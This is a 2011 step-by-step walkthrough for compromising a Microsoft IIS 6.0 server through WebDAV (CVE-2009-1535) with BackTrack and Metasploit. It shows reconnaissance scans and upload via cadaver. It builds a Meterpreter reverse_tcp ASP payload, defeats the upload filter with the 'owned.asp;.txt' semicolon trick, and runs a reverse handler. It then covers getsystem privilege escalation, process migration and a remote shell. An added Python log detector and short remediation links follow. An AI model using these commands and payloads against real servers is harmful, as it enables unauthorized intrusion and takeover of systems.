Sep 23, 2011

Exploiting Microsoft IIS version 6.0 WebDAV with Metasploit (exploit)


BACKGROUND


According to technet.microsoft.com, Web Distributed Authoring and Versioning (WebDAV) extends the HTTP/1.1 protocol to allow clients to publish, lock, and manage resources on the Web.


Integrated into IIS, WebDAV allows clients to do the following:


• Manipulate resources in a WebDAV publishing directory on your server. For example, users who have been assigned the correct rights can copy and move files around in a WebDAV directory.
• Modify properties associated with certain resources. For example, a user can write to and retrieve a file's property information.
• Lock and unlock resources so that multiple users can read a file concurrently. However, only one person can modify the file at a time.
• Search the content and properties of files in a WebDAV directory.

VULNERABILITY


According to cve.mitre.org the WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting %c0%af into a "/protected/" initial pathname component to bypass the password protection on the protected\ folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122.


OPERATING SYSTEMS


The penetration-testing operating system (OS) used for the attack phase is BackTrack 5 (GNOME, VMware, 32-bit); the exploit below was tested on that build. BackTrack is built on Ubuntu, as lsb_release shows:

root@bt$ lsb_release -a

No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 10.04.2 LTS
Release: 10.04
Codename: lucid

Target OS affected:

Windows Server 2003
Windows Server 2003 R2
Windows Server 2003 with SP1

INSTRUCTIONS


First and foremost, log in to the BackTrack terminal as the root user.


Run an nmap scan against the target web server to learn which ports are open and which application and service version is listening on each open port. Include the -O option to detect the operating system (OS) version as well.


TIP:


By default, BackTrack has Nmap installed and ready to go. However, if you use a regular Ubuntu distribution, be advised that you will also need to download and install Network Mapper (Nmap) if it is not already on your system. Please use the following link to do so:



The command:

root@bt:/#nmap -sV -Pn -A -O -n -p 80,135,139,445,53 [target web server]


For example,


Our Windows 2003 server target IP address is: 192.168.216.156

root@bt:/#nmap -sV -Pn -A -O -n -p 80,135,139,445,53 192.168.110.156


The results of the scan are:


Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-18 12:48 EDT

Nmap scan report for 192.168.110.156
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 6.0
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: UBERSEC Digital Forensics
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
MAC Address: 00:0C:29:ED:A0:96 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
Service Info: OS: Windows

---SNIP--- ---SNIP---


The results tell us several things, but the key findings are that the target is a Windows Server 2003 host running Microsoft IIS httpd web server version 6.0, and that the http-methods script lists WebDAV methods (PROPFIND, PUT, COPY, MOVE, MKCOL and so on) as available.


Now we can proceed to our next phase.

root@bt:/#cd /pentest/exploits/framework3


Now load msfconsole from Metasploit v4.0.1-dev

root@bt:/pentest/exploits/framework3#./msfconsole


Now wait a minute for the console to load…


Once the console has loaded, type the following:

msf >use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) >show options
msf auxiliary(webdav_scanner) >set RHOSTS [target web server IP address]


OR

msf auxiliary(webdav_scanner) >set RHOSTS 192.168.110.156
RHOSTS => 192.168.110.156
msf auxiliary(webdav_scanner) >run


The results of the scan are:


[*] 192.168.110.156 (Microsoft-IIS/6.0) has WEBDAV ENABLED

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The results confirm that the target is a Microsoft IIS 6.0 web server with the WebDAV service enabled. This is a prerequisite for our exploit attack.


Now let’s perform one more scan:

msf auxiliary(webdav_scanner) > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) >show options
msf auxiliary(dir_scanner) >set RHOSTS [target web server IP address]


OR

msf auxiliary(dir_scanner) > set RHOSTS 192.168.110.156
RHOSTS => 192.168.110.156
msf auxiliary(dir_scanner) > run


The results of the scan are:


[*] Detecting error code

[*] Using code '404' as not found for 192.168.110.156
[*] Found http://192.168.110.156:80/Pages/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/Templates/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/ToDo/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/_notes/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/finance/ 200 (192.168.110.156)
[*] Found http://192.168.110.156:80/form/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/images/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/pages/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/scripts/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/templates/ 403 (192.168.110.156)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The Metasploit auxiliary module dir_scanner identified quite a few interesting folders on the target web server. The most interesting line in the results is the finance folder, which returned HTTP status code 200. Unlike 403, which means the request was forbidden, a 200 on the finance folder means that someone could possibly access the folder from outside. Serving a folder with 200 and no proper authentication is not good practice. To learn more about HTTP status codes, please refer to the following website:
http://webmaster.iu.edu/tool_guide_info/errorcodes.shtml

Now let's browse to the website in a web browser by entering http://192.168.110.156:80/finance/ to see the contents of the folder:


[Screenshot webdav_1: directory listing of /finance in the browser]


We can see that UBERSEC has some files listed for other users to download or view. Let's go ahead and test whether we can upload a file to the /finance folder rather than only download from it.


Now open another terminal window or tab and log in as root if needed. Then type the following.


Create a simple text file by typing:

root@bt:/#echo "You are owned." > hello.txt


Then use cadaver (a command-line WebDAV client for Unix) to connect to the /finance folder on the target server by typing:

root@bt:/#cadaver http://192.168.110.156/finance


TIP:


If you don't have cadaver installed on your Ubuntu or BackTrack OS, type the following command to install it:

root@bt:/#apt-get install cadaver


Now put the file you created into the /finance folder by typing:

dav:/finance/>put hello.txt


Uploading hello.txt to `/finance/hello.txt':

Progress: [=============================>] 100.0% of 15 bytes succeeded.

Type quit to exit:

dav:/finance/> quit


Connection to `192.168.110.156' closed.


Then browse to the finance folder once again in the web browser:


[Screenshot webdav_2: /finance listing now including hello.txt]


And now we can see that the file we uploaded appears in the folder among the other files.


Since we successfully uploaded the file to the /finance folder, let's try to exploit the server. For that purpose we will use Metasploit.


Change to the framework folder and type the following to create our payload as an ASP file:

root@bt:/pentest/exploits/framework#./msfpayload windows/meterpreter/reverse_tcp LHOST=[the local IP address of your attacking machine] LPORT=8443 R | ./msfencode -t asp -o owned.asp


OR

root@bt:/pentest/exploits/framework#./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.110.129 LPORT=8443 R | ./msfencode -t asp -o owned.asp



[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

Now type ls to list the folder and locate the file you created:

root@bt:/pentest/exploits/framework#ls


STOP!!


It is time to check your work. View the contents of the file by typing:

root@bt:/pentest/exploits/framework#cat owned.asp


buf =

"\xbe\xeb\x20\xee\x30\xd9\xec\xd9\x74\x24\xf4\x58\x33\xc9" +
"\xb1\x49\x31\x70\x14\x83\xe8\xfc\x03\x70\x10\x09\xd5\x12" +
"\xd8\x44\x16\xeb\x19\x36\x9e\x0e\x28\x64\xc4\x5b\x19\xb8" +
"\x8e\x0e\x92\x33\xc2\xba\x21\x31\xcb\xcd\x82\xff\x2d\xe3" +
"\x13\xce\xf1\xaf\xd0\x51\x8e\xad\x04\xb1\xaf\x7d\x59\xb0" +
"\xe8\x60\x92\xe0\xa1\xef\x01\x14\xc5\xb2\x99\x15\x09\xb9" +
"\xa2\x6d\x2c\x7e\x56\xc7\x2f\xaf\xc7\x5c\x67\x57\x63\x3a" +
"\x58\x66\xa0\x59\xa4\x21\xcd\xa9\x5e\xb0\x07\xe0\x9f\x82" +
"\x67\xae\xa1\x2a\x6a\xaf\xe6\x8d\x95\xda\x1c\xee\x28\xdc" +

---SNIP--- ---SNIP---


If you see raw shellcode like the above, then something went wrong or you mistyped something while creating the file with msfpayload and msfencode.


But if you get the following code instead,


<%

Sub wfKwCynJSZoH()
fjnwXX=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)
&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&
Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&
Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&
Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)
&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr
(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)
&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101)

---SNIP--- ---SNIP---


You are ready to rock!


Okay, now connect back to the target WebDAV server using the cadaver command:

root@bt:/#cadaver http://192.168.110.156/finance


Since the target server does not allow us to upload executable web files (such as the ASP format), we have to circumvent that restriction. We upload the payload under a .txt name and then COPY it to a name containing a semicolon, owned.asp;.txt: IIS 6.0 selects the script handler from the part of the filename before the semicolon, so the copy runs as ASP even though the upload filter only saw a .txt file. This is how we are going to do it:

dav:/finance/> put owned.asp owned.txt
Uploading owned.asp to `/finance/owned.txt':
Progress: [=============================>] 100.0% of 1388 bytes succeeded.

dav:/finance/> copy owned.txt owned.asp;.txt

Copying `/finance/owned.txt' to `/finance/owned.asp%3b.txt': succeeded.


Type quit to exit:

dav:/finance/> quit
Connection to `192.168.110.156' closed.
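From the defender's side, the activity in this walkthrough leaves a clear trail in the IIS W3C logs. The following Python detector is an added example (not part of the original post) that flags the three indicators the page relies on: WebDAV write methods from the nmap http-methods list, the semicolon-extension trick (owned.asp;.txt), and the %c0%af overlong slash from CVE-2009-1535. The log lines are constructed, using the IIS 6.0 default field order.

```python
import re
from urllib.parse import unquote

# Constructed IIS 6.0 W3C extended log excerpt (sample data, not from the original page).
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2011-09-19 19:30:01 192.168.110.156 GET /finance/ - 80 - 192.168.110.129 Mozilla/5.0 200 0 0
2011-09-19 19:31:10 192.168.110.156 PUT /finance/owned.txt - 80 - 192.168.110.129 cadaver/0.23.3 201 0 0
2011-09-19 19:31:12 192.168.110.156 COPY /finance/owned.txt - 80 - 192.168.110.129 cadaver/0.23.3 201 0 0
2011-09-19 19:34:16 192.168.110.156 GET /finance/owned.asp;.txt - 80 - 192.168.110.129 Mozilla/5.0 200 0 0
2011-09-19 19:40:00 192.168.110.156 PROPFIND /protected/%c0%af - 80 - 10.0.0.7 Microsoft-WebDAV-MiniRedir/5.1.2600 207 0 0
"""

# WebDAV methods that change server state (from the nmap http-methods list above).
WRITE_METHODS = {"PUT", "COPY", "MOVE", "MKCOL", "PROPPATCH", "DELETE", "LOCK", "UNLOCK"}
# Script extension followed by ';' (owned.asp;.txt): the IIS 6.0 semicolon trick.
SEMICOLON_EXT = re.compile(r"\.asp[a-z]*;", re.IGNORECASE)
# Overlong UTF-8 encoding of '/' used in the CVE-2009-1535 authentication bypass.
OVERLONG_SLASH = b"\xc0\xaf"

def classify(method, stem, query):
    """Return the sorted list of rule names that fire for one request."""
    reasons = []
    if method.upper() in WRITE_METHODS:
        reasons.append("webdav-write-method")
    for part in (stem, query):
        if part == "-":          # IIS writes '-' for an empty field
            continue
        # Decode two rounds so %25c0%25af (double encoding) is caught too; latin-1 keeps raw bytes.
        for _ in range(2):
            part = unquote(part, encoding="latin-1")
        if SEMICOLON_EXT.search(part):
            reasons.append("semicolon-extension")
        if OVERLONG_SLASH in part.encode("latin-1", "replace"):
            reasons.append("overlong-slash")
    return sorted(set(reasons))

def detect(log_text):
    """Return (client_ip, method, uri_stem, reasons) for each suspicious W3C log line."""
    fields, hits = None, []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # column names follow the directive
            continue
        cols = line.split(" ")
        # IIS replaces embedded spaces with '+', so a valid row has exactly len(fields) columns.
        if not fields or line.startswith("#") or len(cols) != len(fields):
            continue
        rec = dict(zip(fields, cols))
        reasons = classify(rec["cs-method"], rec["cs-uri-stem"], rec["cs-uri-query"])
        if reasons:
            hits.append((rec["c-ip"], rec["cs-method"], rec["cs-uri-stem"], reasons))
    return hits
```

Running detect(SAMPLE_LOG) returns the PUT, COPY, semicolon GET and %c0%af PROPFIND rows while the plain GET /finance/ passes through untouched.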


Now, load the msfconsole by typing:

root@bt:/pentest/exploits/framework#./msfconsole


Then type:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST [the IP of your hacking OS]
msf exploit(handler) > set LPORT [Listening port number]


OR


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.110.129
msf exploit(handler) > set LPORT 8443
LPORT => 8443


Now type show options to see your options:

msf exploit(handler) >show options


Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.110.129  yes       The listen address
   LPORT     8443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set ExitOnSession false
ExitOnSession => false

Now type exploit -j to start running the exploit as a background job:

msf exploit(handler) > exploit -j


[*] Exploit running as background job.

[*] Started reverse handler on 192.168.110.129:8443
[*] Starting the payload handler...
msf exploit(handler) >

Now browse back to the website and click on the file you manipulated in the previous step, owned.asp;.txt:


http://192.168.110.156/finance/owned.asp;.txt


[Screenshot webdav_3: browser requesting owned.asp;.txt]


The file will appear to load but nothing seems to happen. Or did it?
:-)

Well, go back to the terminal window where you typed exploit -j earlier.

Now you should see the following:

[*] Started reverse handler on 192.168.110.129:8443

[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.110.156
[*] Meterpreter session 1 opened (192.168.110.129:8443 -> 192.168.110.156:1908) at 2011-09-19 15:34:16 -0400

If that is the case, type sessions and press [ENTER]:

msf exploit(handler) >sessions


Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.168.110.129:8443 -> 192.168.110.156:1908

You can see that Metasploit has one active session. So let's connect to it by typing:

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

Now let's attempt to elevate privileges by typing:

meterpreter >getsystem


...got system (via technique 4)


Now type ps to see all processes running on the target web server:

meterpreter >ps


[Screenshot webdav_4: output of the ps command]


The process we are interested in is explorer.exe. We want to migrate our session into that process so that the session does not crash and get terminated by the target web server, for example when the IIS worker process that served our ASP page is recycled.


Now type migrate followed by the process ID of explorer.exe to migrate into that process:

meterpreter > migrate 3464


[*] Migrating to 3464...

[*] Migration completed successfully.

Now type shell to get access to the command line on target server:

meterpreter > shell


Process 1264 created.

Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator>


Now create a test file to see whether you own the web server:

C:\Documents and Settings\Administrator>echo "The server has be exploited" > test.txt


echo "The server has be exploited" > test.txt


C:\Documents and Settings\Administrator>


Now go to the web server itself (if you have access to it) and open a command prompt from the Run dialog:


[Screenshot webdav_5: test.txt present on the server]


You can see that you have successfully gained access to the server and created a text file.


You are done!


You can also download my PDF document for your records from the following link:



ALTERNATIVES


An alternative exploit can be downloaded from Exploit-DB:



REMEDIATION


Please use the following link for managing WebDAV security (IIS 6.0):




Please use the following link for implementing a secure WebDAV system:



Please use the following link to download Microsoft security tools such as:


Microsoft Security Compliance Manager

Microsoft Baseline Security Analyzer
Microsoft Security Assessment Tool


RESOURCES


Common Vulnerabilities and Exposures CVE-2009-1535



Microsoft Security Bulletin MS09-020 – Important



Installing IIS server and configuring WebDAV




HOW TO: Create and Configure Active Server Pages (ASP) Web Applications in the Windows Server 2003

 

